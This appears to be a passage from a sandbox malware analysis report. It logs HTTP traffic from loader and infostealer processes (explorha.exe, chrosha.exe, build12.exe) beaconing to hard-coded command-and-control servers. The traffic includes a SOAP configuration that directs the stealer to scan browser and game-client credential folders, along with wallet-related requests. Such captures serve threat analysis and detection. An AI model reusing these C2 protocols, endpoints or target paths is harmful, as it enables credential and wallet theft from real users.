                                                                                                                                                                                                                                      Apr 19, 2024 03:30:07.796271086 CEST1289INData Raw: 10 f3 0f 7e 46 10 66 0f d6 05 90 b9 01 10 c7 46 10 00 00 00 00 c7 46 14 0f 00 00 00 c6 06 00 8b 55 cc 83 fa 10 72 2c 8b 4d b8 42 8b c1 81 fa 00 10 00 00 72 14 8b 49 fc 83 c2 23 2b c1 83 c0 fc 83 f8 1f 0f 87 aa 12 00 00 52 51 e8 a5 2a 00 00 83 c4
                                                                                                                                                                                                                                      Data Ascii: ~FfFFUr,MBrI#+RQ*uEePlEjhAAV E0EEEHE;0+;B}ECEMVP r.ArP
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:07.796291113 CEST1289INData Raw: c4 30 c7 45 c8 00 00 00 00 c7 45 cc 0f 00 00 00 c6 45 b8 00 8d 48 ff b8 b0 b9 01 10 39 0d c0 b9 01 10 0f 42 0d c0 b9 01 10 83 3d c4 b9 01 10 10 51 0f 43 05 b0 b9 01 10 8d 4d b8 50 e8 99 1b 00 00 8b 0d c4 b9 01 10 83 f9 10 72 2e a1 b0 b9 01 10 41
                                                                                                                                                                                                                                      Data Ascii: 0EEEH9B=QCMPr.ArP#+wQPu%EU~EMfAA9B=RCPMt|
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:08.043592930 CEST1289INData Raw: fa 10 72 2c 8b 4d b8 42 8b c1 81 fa 00 10 00 00 72 14 8b 49 fc 83 c2 23 2b c1 83 c0 fc 83 f8 1f 0f 87 d4 08 00 00 52 51 e8 b6 20 00 00 83 c4 08 83 ec 18 8b cc 89 65 d4 68 78 b8 01 10 e8 7f 14 00 00 83 ec 18 c6 45 fc 12 8b cc 68 c8 b9 01 10 e8 6c
                                                                                                                                                                                                                                      Data Ascii: r,MBrI#+RQ ehxEhlME0t|r.ArP#+dQP? ~FfFFUr,


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      64192.168.2.549885193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:07.719329119 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:07.957851887 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:07 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:07.987552881 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:08.231852055 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:08 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      65192.168.2.549886193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:07.998984098 CEST183OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 31
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 64 31 3d 31 30 30 30 31 38 38 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39
                                                                                                                                                                                                                                      Data Ascii: d1=1000188001&unit=246122658369
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:08.246169090 CEST193INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:08 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 4 <c>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      66192.168.2.549887193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:08.666785955 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:08.912692070 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:08 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:08.914594889 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:09.164545059 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:09 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      67192.168.2.549888193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:08.667772055 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:08.908885002 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:08 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      68192.168.2.549889147.185.221.19309467324C:\Users\user\AppData\Local\Temp\1000188001\build12.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:08.701119900 CEST248OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: text/xml; charset=utf-8
                                                                                                                                                                                                                                      SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"
                                                                                                                                                                                                                                      Host: b-stamps.gl.at.ply.gg:30946
                                                                                                                                                                                                                                      Content-Length: 137
                                                                                                                                                                                                                                      Expect: 100-continue
                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:09.131906033 CEST385OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: text/xml; charset=utf-8
                                                                                                                                                                                                                                      SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"
                                                                                                                                                                                                                                      Host: b-stamps.gl.at.ply.gg:30946
                                                                                                                                                                                                                                      Content-Length: 137
                                                                                                                                                                                                                                      Expect: 100-continue
                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                      Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 43 68 65 63 6b 43 6f 6e 6e 65 63 74 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 2f 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e
                                                                                                                                                                                                                                      Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><CheckConnect xmlns="http://tempuri.org/"/></s:Body></s:Envelope>
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:19.787519932 CEST359INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Content-Length: 212
                                                                                                                                                                                                                                      Content-Type: text/xml; charset=utf-8
                                                                                                                                                                                                                                      Server: Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:19 GMT
                                                                                                                                                                                                                                      Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 3e 3c 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 75 6c 74 3e 74 72 75 65 3c 2f 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 75 6c 74 3e 3c 2f 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 70 6f 6e 73 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e
                                                                                                                                                                                                                                      Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><CheckConnectResponse xmlns="http://tempuri.org/"><CheckConnectResult>true</CheckConnectResult></CheckConnectResponse></s:Body></s:Envelope>
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:20.096012115 CEST359INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Content-Length: 212
                                                                                                                                                                                                                                      Content-Type: text/xml; charset=utf-8
                                                                                                                                                                                                                                      Server: Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:19 GMT
                                                                                                                                                                                                                                      Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 3e 3c 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 75 6c 74 3e 74 72 75 65 3c 2f 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 75 6c 74 3e 3c 2f 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 70 6f 6e 73 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e
                                                                                                                                                                                                                                      Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><CheckConnectResponse xmlns="http://tempuri.org/"><CheckConnectResult>true</CheckConnectResult></CheckConnectResponse></s:Body></s:Envelope>
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:24.843470097 CEST231OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: text/xml; charset=utf-8
                                                                                                                                                                                                                                      SOAPAction: "http://tempuri.org/Endpoint/EnvironmentSettings"
                                                                                                                                                                                                                                      Host: b-stamps.gl.at.ply.gg:30946
                                                                                                                                                                                                                                      Content-Length: 144
                                                                                                                                                                                                                                      Expect: 100-continue
                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:33.711553097 CEST1248INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Content-Length: 4744
                                                                                                                                                                                                                                      Content-Type: text/xml; charset=utf-8
                                                                                                                                                                                                                                      Server: Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:33 GMT
                                                                                                                                                                                                                                      Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 45 6e 76 69 72 6f 6e 6d 65 6e 74 53 65 74 74 69 6e 67 73 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 3e 3c 45 6e 76 69 72 6f 6e 6d 65 6e 74 53 65 74 74 69 6e 67 73 52 65 73 75 6c 74 20 78 6d 6c 6e 73 3a 61 3d 22 42 72 6f 77 73 65 72 45 78 74 65 6e 73 69 6f 6e 22 20 78 6d 6c 6e 73 3a 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 3e 3c 61 3a 42 6c 6f 63 6b 65 64 43 6f 75 6e 74 72 79 20 78 6d 6c 6e 73 3a 62 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 32 30 30 33 2f 31 30 2f 53 65 72 69 61 6c 69 7a 61 74 69 6f 6e 2f 41 72 72 61 79 73 22 2f 3e 3c 61 3a 42 6c 6f 63 6b 65 64 49 50 20 78 6d 6c 6e 73 3a 62 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 32 30 30 33 2f 31 30 2f 53 65 72 69 61 6c 69 7a 61 74 69 6f 6e 2f 41 72 72 61 79 73 22 2f 3e 3c 61 3a 4f 62 6a 65 63 74 34 3e 74 72 75 65 3c 2f 61 3a 4f 62 6a 65 63 74 34 3e 3c 61 3a 4f 62 6a 65 63 74 36 3e 66 61 6c 73 65 3c 2f 61 3a 4f 62 6a 65 63 74 36 3e 3c 61 3a 53 63 61 6e 42 72 6f 77 73 65 72 73 3e 74 72 75 65 3c 2f 61 3a 53 63 61 6e 42 72 6f 77 73 65 72 73 3e 3c 61 3a 53 63 61 6e 43 68 72 6f 6d 65 42 72 6f 77 73 65 72 73 50 61 74 68 73 20 78 6d 6c 6e 73 3a 62 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 32 30 30 33 2f 31 30 2f 53 65 72 69 61 6c 69 7a 61 74 69 6f 6e 2f 41 72 72 61 79 73 22 3e 3c 62 3a 73 74 72 69 6e 67 3e 25 55 53 45 52 50 52 4f 46 49 4c 45 25 5c 41 70 70 44 61 74 61 5c 4c 6f 63 61 6c 5c 42 61 74 74 6c 65 2e 6e 65 74 3c 2f 62 3a 73 74 72 69 6e 67 3e 3c 62 3a 73 74 72 69 6e 67 3e 25 55 53 45 52 50 52 4f 46 49 4c 45 25 5c 41 70 70 44 61 74 61 5c 4c 6f 63 61 6c 5c 43 68 72 6f 6d 69 75 6d 5c 55 73 65 72 20 44 61 74 61 3c 2f 62 3a 73 74 72 69 6e 67 3e 3c 62 3a 73 74 72 69 6e 67 3e 25 55 53 45 52 50 52 4f 46 49 4c 45 25 5c 41 70 70 44 61 74 61 5c 4c 6f 63 61 6c 5c 47 6f 6f 67 6c 65 5c 43 68 72 6f 6d 65 5c 55 73 65 72 20 44 61 74 61 3c 2f 62 3a 73 74 72 69 6e 67 3e 3c 62 3a 73 74 72 69 6e 67 3e 25 55 53 45 52 50 52 4f 46 49 4c 45 25 5c 41 70 70 44 61 74 61 5c 4c 6f 63 61 6c 5c 47 6f 6f 67 6c 65 28 78 38 36 29 5c 43 68 72 6f 6d 65 5c 55 73 65 72 20 44 61 74 61 3c 2f 62 3a 73 74 72 69 6e 67 3e 3c 62 3a 73 74 72 69 6e 67 3e 25 55 53 45 52 50 52 4f 46 49 4c 45 25 5c 41 70 70 44 61 74 61 5c 52 6f 61 6d 69 6e 67 5c 4f 70 65 72 61 20 53 6f 66 74 77 61 72 65 5c 3c 2f 62 3a 73 74 72 69 6e 67 3e 3c 62 3a 73 74 72 69 6e 67 3e 25 55 53 45 52 50 52 4f 46 49 4c 45 25 5c 41 70 70 44 61 74 61 5c 4c 6f 63 61 6c 5c 4d 61 70 6c 65 53 74 75 64 69 6f 5c 43 68 72 6f 6d 65 50 6c 75 73 5c 55 73 65 72 20 44 61 74 61 3c 2f 62 3a 73 74 72 69 6e 67 3e 3c 62 3a 73 74 72 69 6e 67 3e 25 55 53 45 52 50 52 4f 46 49 4c 45 25 5c 41 70 70 44 61 74 61 5c 4c 6f 63 61 6c 5c 49 72 69 64 69 75 6d 5c 55 73 65 72 20 44 61 74 61 3c 2f 62 3a 73 74 72 69 6e 67 3e 3c 62 3a 73 74 72 69 6e 67 3e 25 55 53 45 52 50 52 4f 46 49 4c
                                                                                                                                                                                                                                      Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><EnvironmentSettingsResponse xmlns="http://tempuri.org/"><EnvironmentSettingsResult xmlns:a="BrowserExtension" xmlns:i="http://www.w3.org/2001/XMLSchema-instance"><a:BlockedCountry xmlns:b="http://schemas.microsoft.com/2003/10/Serialization/Arrays"/><a:BlockedIP xmlns:b="http://schemas.microsoft.com/2003/10/Serialization/Arrays"/><a:Object4>true</a:Object4><a:Object6>false</a:Object6><a:ScanBrowsers>true</a:ScanBrowsers><a:ScanChromeBrowsersPaths xmlns:b="http://schemas.microsoft.com/2003/10/Serialization/Arrays"><b:string>%USERPROFILE%\AppData\Local\Battle.net</b:string><b:string>%USERPROFILE%\AppData\Local\Chromium\User Data</b:string><b:string>%USERPROFILE%\AppData\Local\Google\Chrome\User Data</b:string><b:string>%USERPROFILE%\AppData\Local\Google(x86)\Chrome\User Data</b:string><b:string>%USERPROFILE%\AppData\Roaming\Opera Software\</b:string><b:string>%USERPROFILE%\AppData\Local\MapleStudio\ChromePlus\User Data</b:string><b:string>%USERPROFILE%\AppData\Local\Iridium\User Data</b:string><b:string>%USERPROFIL


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      69192.168.2.549890193.233.132.16780
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:08.961575031 CEST156OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 5
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 77 6c 74 3d 31
                                                                                                                                                                                                                                      Data Ascii: wlt=1
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:09.212527037 CEST719INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:09 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 32 31 30 0d 0a 20 2b 2b 2b 5f 31 5f 39 64 33 66 64 38 30 32 31 38 32 64 63 31 35 61 33 34 61 31 39 37 62 36 66 63 64 34 36 61 62 39 38 65 36 30 30 63 62 64 61 65 36 64 33 64 35 33 39 34 39 38 66 31 30 32 35 61 62 38 37 61 65 37 30 32 37 31 30 30 39 32 31 66 65 37 61 36 36 61 64 66 35 66 2d 31 2d 5f 32 5f 63 66 32 34 64 31 34 61 32 65 37 32 38 66 36 39 36 36 66 62 63 34 66 64 62 61 63 36 33 65 38 38 64 38 33 39 35 39 66 62 66 65 36 30 34 64 30 64 64 38 39 32 66 31 33 33 35 63 65 63 32 64 39 33 35 33 32 33 35 33 63 39 35 38 62 32 64 30 36 36 64 38 32 63 2d 32 2d 5f 33 5f 62 33 33 38 62 30 30 30 31 62 31 36 63 39 31 61 36 64 61 32 61 35 66 66 64 36 65 39 34 35 39 39 39 65 33 35 30 32 61 64 61 62 36 32 37 64 30 30 38 62 64 39 38 31 33 34 30 36 62 33 37 35 65 36 32 66 33 34 2d 33 2d 5f 34 5f 62 62 31 65 38 33 30 39 30 64 32 37 64 32 31 66 37 36 61 34 39 63 38 30 64 64 63 35 35 65 38 61 61 31 30 61 30 66 38 32 63 64 32 32 35 32 30 30 39 64 63 31 61 36 33 62 31 37 39 37 35 61 62 36 30 39 32 34 2d 34 2d 5f 35 5f 63 62 36 65 39 33 31 31 33 31 30 63 38 65 34 33 37 39 61 62 63 30 61 35 63 38 66 34 34 35 66 61 38 35 32 30 32 65 61 32 63 64 36 34 34 63 36 37 61 63 64 64 38 63 31 64 32 39 38 30 32 66 61 64 35 33 30 39 31 37 62 66 33 35 65 39 64 66 37 66 62 62 32 32 32 64 35 61 38 36 34 61 35 39 30 63 34 63 62 38 39 39 34 36 33 37 37 65 33 34 39 35 65 36 31 62 35 63 65 65 39 39 63 31 65 37 65 32 66 33 61 63 62 62 37 65 66 61 33 33 61 65 32 37 30 39 32 36 37 31 35 31 63 66 30 63 64 36 32 39 31 66 38 31 34 33 34 38 32 33 34 39 66 39 61 63 66 32 31 62 33 64 37 38 34 65 32 37 32 64 2d 35 2d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 210 +++_1_9d3fd802182dc15a34a197b6fcd46ab98e600cbdae6d3d539498f1025ab87ae7027100921fe7a66adf5f-1-_2_cf24d14a2e728f6966fbc4fdbac63e88d83959fbfe604d0dd892f1335cec2d93532353c958b2d066d82c-2-_3_b338b0001b16c91a6da2a5ffd6e945999e3502adab627d008bd9813406b375e62f34-3-_4_bb1e83090d27d21f76a49c80ddc55e8aa10a0f82cd2252009dc1a63b17975ab60924-4-_5_cb6e9311310c8e4379abc0a5c8f445fa85202ea2cd644c67acdd8c1d29802fad530917bf35e9df7fbb222d5a864a590c4cb89946377e3495e61b5cee99c1e7e2f3acbb7efa33ae2709267151cf0cd6291f8143482349f9acf21b3d784e272d-5-0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      70192.168.2.549891193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:09.153615952 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
